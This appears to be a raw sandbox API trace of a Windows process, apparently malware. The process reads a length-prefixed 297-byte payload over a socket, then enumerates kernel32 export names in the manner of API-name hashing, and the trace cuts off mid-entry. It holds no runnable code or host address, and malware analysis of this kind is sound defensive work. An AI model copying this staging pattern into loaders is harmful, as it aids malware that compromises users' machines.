1 [0179.346] recv (in: s=0x214, buf=0x31cf315, len=1, flags=0 | out: buf=0x31cf315*) returned 1 [0179.346] recv (in: s=0x214, buf=0x31cf316, len=1, flags=0 | out: buf=0x31cf316*) returned 1 [0179.346] recv (in: s=0x214, buf=0x31cf317, len=1, flags=0 | out: buf=0x31cf317*) returned 1 [0179.346] recv (in: s=0x214, buf=0x31cf318, len=1, flags=0 | out: buf=0x31cf318*) returned 1 [0179.346] recv (in: s=0x214, buf=0x31cf319, len=1, flags=0 | out: buf=0x31cf319*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf31a, len=1, flags=0 | out: buf=0x31cf31a*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf31b, len=1, flags=0 | out: buf=0x31cf31b*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf31c, len=1, flags=0 | out: buf=0x31cf31c*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf31d, len=1, flags=0 | out: buf=0x31cf31d*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf31e, len=1, flags=0 | out: buf=0x31cf31e*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf31f, len=1, flags=0 | out: buf=0x31cf31f*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf320, len=1, flags=0 | out: buf=0x31cf320*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf321, len=1, flags=0 | out: buf=0x31cf321*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf322, len=1, flags=0 | out: buf=0x31cf322*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf323, len=1, flags=0 | out: buf=0x31cf323*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf324, len=1, flags=0 | out: buf=0x31cf324*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf325, len=1, flags=0 | out: buf=0x31cf325*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf326, len=1, flags=0 | out: buf=0x31cf326*) returned 1 [0179.347] recv (in: s=0x214, buf=0x31cf327, len=1, flags=0 | out: buf=0x31cf327*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf328, len=1, flags=0 | out: buf=0x31cf328*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf329, len=1, flags=0 | out: buf=0x31cf329*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf32a, len=1, flags=0 | out: buf=0x31cf32a*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf32b, len=1, flags=0 | out: buf=0x31cf32b*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf32c, len=1, flags=0 | out: buf=0x31cf32c*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf32d, len=1, flags=0 | out: buf=0x31cf32d*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf32e, len=1, flags=0 | out: buf=0x31cf32e*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf32f, len=1, flags=0 | out: buf=0x31cf32f*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf330, len=1, flags=0 | out: buf=0x31cf330*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf331, len=1, flags=0 | out: buf=0x31cf331*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf332, len=1, flags=0 | out: buf=0x31cf332*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf333, len=1, flags=0 | out: buf=0x31cf333*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf334, len=1, flags=0 | out: buf=0x31cf334*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf335, len=1, flags=0 | out: buf=0x31cf335*) returned 1 [0179.348] recv (in: s=0x214, buf=0x31cf336, len=1, flags=0 | out: buf=0x31cf336*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf337, len=1, flags=0 | out: buf=0x31cf337*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf338, len=1, flags=0 | out: buf=0x31cf338*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf339, len=1, flags=0 | out: buf=0x31cf339*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf33a, len=1, flags=0 | out: buf=0x31cf33a*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf33b, len=1, flags=0 | out: buf=0x31cf33b*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf33c, len=1, flags=0 | out: buf=0x31cf33c*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf33d, len=1, flags=0 | out: buf=0x31cf33d*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf33e, len=1, flags=0 | out: buf=0x31cf33e*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf33f, len=1, flags=0 | out: buf=0x31cf33f*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf340, len=1, flags=0 | out: buf=0x31cf340*) returned 1 [0179.349] recv (in: s=0x214, buf=0x31cf341, len=1, flags=0 | out: buf=0x31cf341*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf342, len=1, flags=0 | out: buf=0x31cf342*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf343, len=1, flags=0 | out: buf=0x31cf343*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf344, len=1, flags=0 | out: buf=0x31cf344*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf345, len=1, flags=0 | out: buf=0x31cf345*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf346, len=1, flags=0 | out: buf=0x31cf346*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf347, len=1, flags=0 | out: buf=0x31cf347*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf348, len=1, flags=0 | out: buf=0x31cf348*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf349, len=1, flags=0 | out: buf=0x31cf349*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf34a, len=1, flags=0 | out: buf=0x31cf34a*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf34b, len=1, flags=0 | out: buf=0x31cf34b*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf34c, len=1, flags=0 | out: buf=0x31cf34c*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf34d, len=1, flags=0 | out: buf=0x31cf34d*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf34e, len=1, flags=0 | out: buf=0x31cf34e*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf34f, len=1, flags=0 | out: buf=0x31cf34f*) returned 1 [0179.350] recv (in: s=0x214, buf=0x31cf350, len=1, flags=0 | out: buf=0x31cf350*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf351, len=1, flags=0 | out: buf=0x31cf351*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf352, len=1, flags=0 | out: buf=0x31cf352*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf353, len=1, flags=0 | out: buf=0x31cf353*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf354, len=1, flags=0 | out: buf=0x31cf354*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf355, len=1, flags=0 | out: buf=0x31cf355*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf356, len=1, flags=0 | out: buf=0x31cf356*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf357, len=1, flags=0 | out: buf=0x31cf357*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf358, len=1, flags=0 | out: buf=0x31cf358*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf359, len=1, flags=0 | out: buf=0x31cf359*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf35a, len=1, flags=0 | out: buf=0x31cf35a*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf35b, len=1, flags=0 | out: buf=0x31cf35b*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf35c, len=1, flags=0 | out: buf=0x31cf35c*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf35d, len=1, flags=0 | out: buf=0x31cf35d*) returned 1 [0179.351] recv (in: s=0x214, buf=0x31cf35e, len=1, flags=0 | out: buf=0x31cf35e*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf35f, len=1, flags=0 | out: buf=0x31cf35f*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf360, len=1, flags=0 | out: buf=0x31cf360*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf361, len=1, flags=0 | out: buf=0x31cf361*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf362, len=1, flags=0 | out: buf=0x31cf362*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf363, len=1, flags=0 | out: buf=0x31cf363*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf364, len=1, flags=0 | out: buf=0x31cf364*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf365, len=1, flags=0 | out: buf=0x31cf365*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf366, len=1, flags=0 | out: buf=0x31cf366*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf367, len=1, flags=0 | out: buf=0x31cf367*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf368, len=1, flags=0 | out: buf=0x31cf368*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf369, len=1, flags=0 | out: buf=0x31cf369*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf36a, len=1, flags=0 | out: buf=0x31cf36a*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf36b, len=1, flags=0 | out: buf=0x31cf36b*) returned 1 [0179.352] recv (in: s=0x214, buf=0x31cf36c, len=1, flags=0 | out: buf=0x31cf36c*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf36d, len=1, flags=0 | out: buf=0x31cf36d*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf36e, len=1, flags=0 | out: buf=0x31cf36e*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf36f, len=1, flags=0 | out: buf=0x31cf36f*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf370, len=1, flags=0 | out: buf=0x31cf370*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf371, len=1, flags=0 | out: buf=0x31cf371*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf372, len=1, flags=0 | out: buf=0x31cf372*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf373, len=1, flags=0 | out: buf=0x31cf373*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf374, len=1, flags=0 | out: buf=0x31cf374*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf375, len=1, flags=0 | out: buf=0x31cf375*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf376, len=1, flags=0 | out: buf=0x31cf376*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf377, len=1, flags=0 | out: buf=0x31cf377*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf378, len=1, flags=0 | out: buf=0x31cf378*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf379, len=1, flags=0 | out: buf=0x31cf379*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf37a, len=1, flags=0 | out: buf=0x31cf37a*) returned 1 [0179.353] recv (in: s=0x214, buf=0x31cf37b, len=1, flags=0 | out: buf=0x31cf37b*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf37c, len=1, flags=0 | out: buf=0x31cf37c*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf37d, len=1, flags=0 | out: buf=0x31cf37d*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf37e, len=1, flags=0 | out: buf=0x31cf37e*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf37f, len=1, flags=0 | out: buf=0x31cf37f*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf380, len=1, flags=0 | out: buf=0x31cf380*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf381, len=1, flags=0 | out: buf=0x31cf381*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf382, len=1, flags=0 | out: buf=0x31cf382*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf383, len=1, flags=0 | out: buf=0x31cf383*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf384, len=1, flags=0 | out: buf=0x31cf384*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf385, len=1, flags=0 | out: buf=0x31cf385*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf386, len=1, flags=0 | out: buf=0x31cf386*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf387, len=1, flags=0 | out: buf=0x31cf387*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf388, len=1, flags=0 | out: buf=0x31cf388*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf389, len=1, flags=0 | out: buf=0x31cf389*) returned 1 [0179.354] recv (in: s=0x214, buf=0x31cf38a, len=1, flags=0 | out: buf=0x31cf38a*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf38b, len=1, flags=0 | out: buf=0x31cf38b*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf38c, len=1, flags=0 | out: buf=0x31cf38c*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf38d, len=1, flags=0 | out: buf=0x31cf38d*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf38e, len=1, flags=0 | out: buf=0x31cf38e*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf38f, len=1, flags=0 | out: buf=0x31cf38f*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf390, len=1, flags=0 | out: buf=0x31cf390*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf391, len=1, flags=0 | out: buf=0x31cf391*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf392, len=1, flags=0 | out: buf=0x31cf392*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf393, len=1, flags=0 | out: buf=0x31cf393*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf394, len=1, flags=0 | out: buf=0x31cf394*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf395, len=1, flags=0 | out: buf=0x31cf395*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf396, len=1, flags=0 | out: buf=0x31cf396*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf397, len=1, flags=0 | out: buf=0x31cf397*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf398, len=1, flags=0 | out: buf=0x31cf398*) returned 1 [0179.355] recv (in: s=0x214, buf=0x31cf399, len=1, flags=0 | out: buf=0x31cf399*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf39a, len=1, flags=0 | out: buf=0x31cf39a*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf39b, len=1, flags=0 | out: buf=0x31cf39b*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf39c, len=1, flags=0 | out: buf=0x31cf39c*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf39d, len=1, flags=0 | out: buf=0x31cf39d*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf39e, len=1, flags=0 | out: buf=0x31cf39e*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf39f, len=1, flags=0 | out: buf=0x31cf39f*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf3a0, len=1, flags=0 | out: buf=0x31cf3a0*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf3a1, len=1, flags=0 | out: buf=0x31cf3a1*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf3a2, len=1, flags=0 | out: buf=0x31cf3a2*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf3a3, len=1, flags=0 | out: buf=0x31cf3a3*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf3a4, len=1, flags=0 | out: buf=0x31cf3a4*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf3a5, len=1, flags=0 | out: buf=0x31cf3a5*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf3a6, len=1, flags=0 | out: buf=0x31cf3a6*) returned 1 [0179.356] recv (in: s=0x214, buf=0x31cf3a7, len=1, flags=0 | out: buf=0x31cf3a7*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3a8, len=1, flags=0 | out: buf=0x31cf3a8*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3a9, len=1, flags=0 | out: buf=0x31cf3a9*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3aa, len=1, flags=0 | out: buf=0x31cf3aa*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3ab, len=1, flags=0 | out: buf=0x31cf3ab*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3ac, len=1, flags=0 | out: buf=0x31cf3ac*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3ad, len=1, flags=0 | out: buf=0x31cf3ad*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3ae, len=1, flags=0 | out: buf=0x31cf3ae*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3af, len=1, flags=0 | out: buf=0x31cf3af*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3b0, len=1, flags=0 | out: buf=0x31cf3b0*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3b1, len=1, flags=0 | out: buf=0x31cf3b1*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3b2, len=1, flags=0 | out: buf=0x31cf3b2*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3b3, len=1, flags=0 | out: buf=0x31cf3b3*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3b4, len=1, flags=0 | out: buf=0x31cf3b4*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3b5, len=1, flags=0 | out: buf=0x31cf3b5*) returned 1 [0179.357] recv (in: s=0x214, buf=0x31cf3b6, len=1, flags=0 | out: buf=0x31cf3b6*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3b7, len=1, flags=0 | out: buf=0x31cf3b7*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3b8, len=1, flags=0 | out: buf=0x31cf3b8*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3b9, len=1, flags=0 | out: buf=0x31cf3b9*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3ba, len=1, flags=0 | out: buf=0x31cf3ba*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3bb, len=1, flags=0 | out: buf=0x31cf3bb*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3bc, len=1, flags=0 | out: buf=0x31cf3bc*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3bd, len=1, flags=0 | out: buf=0x31cf3bd*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3be, len=1, flags=0 | out: buf=0x31cf3be*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3bf, len=1, flags=0 | out: buf=0x31cf3bf*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3c0, len=1, flags=0 | out: buf=0x31cf3c0*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3c1, len=1, flags=0 | out: buf=0x31cf3c1*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3c2, len=1, flags=0 | out: buf=0x31cf3c2*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3c3, len=1, flags=0 | out: buf=0x31cf3c3*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3c4, len=1, flags=0 | out: buf=0x31cf3c4*) returned 1 [0179.358] recv (in: s=0x214, buf=0x31cf3c5, len=1, flags=0 | out: buf=0x31cf3c5*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3c6, len=1, flags=0 | out: buf=0x31cf3c6*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3c7, len=1, flags=0 | out: buf=0x31cf3c7*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3c8, len=1, flags=0 | out: buf=0x31cf3c8*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3c9, len=1, flags=0 | out: buf=0x31cf3c9*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3ca, len=1, flags=0 | out: buf=0x31cf3ca*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3cb, len=1, flags=0 | out: buf=0x31cf3cb*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3cc, len=1, flags=0 | out: buf=0x31cf3cc*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3cd, len=1, flags=0 | out: buf=0x31cf3cd*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3ce, len=1, flags=0 | out: buf=0x31cf3ce*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3cf, len=1, flags=0 | out: buf=0x31cf3cf*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3d0, len=1, flags=0 | out: buf=0x31cf3d0*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3d1, len=1, flags=0 | out: buf=0x31cf3d1*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3d2, len=1, flags=0 | out: buf=0x31cf3d2*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3d3, len=1, flags=0 | out: buf=0x31cf3d3*) returned 1 [0179.359] recv (in: s=0x214, buf=0x31cf3d4, len=1, flags=0 | out: buf=0x31cf3d4*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3d5, len=1, flags=0 | out: buf=0x31cf3d5*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3d6, len=1, flags=0 | out: buf=0x31cf3d6*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3d7, len=1, flags=0 | out: buf=0x31cf3d7*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3d8, len=1, flags=0 | out: buf=0x31cf3d8*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3d9, len=1, flags=0 | out: buf=0x31cf3d9*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3da, len=1, flags=0 | out: buf=0x31cf3da*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3db, len=1, flags=0 | out: buf=0x31cf3db*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3dc, len=1, flags=0 | out: buf=0x31cf3dc*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3dd, len=1, flags=0 | out: buf=0x31cf3dd*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3de, len=1, flags=0 | out: buf=0x31cf3de*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3df, len=1, flags=0 | out: buf=0x31cf3df*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3e0, len=1, flags=0 | out: buf=0x31cf3e0*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3e1, len=1, flags=0 | out: buf=0x31cf3e1*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3e2, len=1, flags=0 | out: buf=0x31cf3e2*) returned 1 [0179.360] recv (in: s=0x214, buf=0x31cf3e3, len=1, flags=0 | out: buf=0x31cf3e3*) returned 1 [0179.361] recv (in: s=0x214, buf=0x31cf3e4, len=1, flags=0 | out: buf=0x31cf3e4*) returned 1 [0179.361] StrToIntA (lpSrc="297") returned 297 [0179.361] VirtualAlloc (lpAddress=0x0, dwSize=0x129, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0179.361] recv (in: s=0x214, buf=0x8a0000, len=297, flags=0 | out: buf=0x8a0000*) returned 297 [0179.361] VirtualFree (lpAddress=0x6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.361] VirtualFree (lpAddress=0x730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.361] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.362] closesocket (s=0x214) returned 0 [0179.362] WSACleanup () returned 0 [0179.383] VirtualFree (lpAddress=0x610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.383] VirtualFree (lpAddress=0x620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.384] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.384] VirtualFree (lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.384] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.384] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.384] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.385] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3a0000 [0179.385] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000 [0179.385] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0179.385] GetTickCount () returned 0x11344af [0179.385] GetTickCount () returned 0x11344af [0179.385] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0179.385] lstrlenA (lpString="kernel32.dll") returned 12 [0179.386] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0179.386] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0179.386] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0179.386] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0179.386] lstrlenA (lpString="ADDATOMA") returned 8 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0179.386] lstrlenA (lpString="ADDATOMW") returned 8 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0179.386] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0179.386] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0179.386] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0179.386] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0179.386] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0179.386] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0179.386] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0179.386] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0179.386] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0179.386] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0179.386] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0179.386] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0179.386] lstrcpyA (in: lpString1=0x31cec6c, 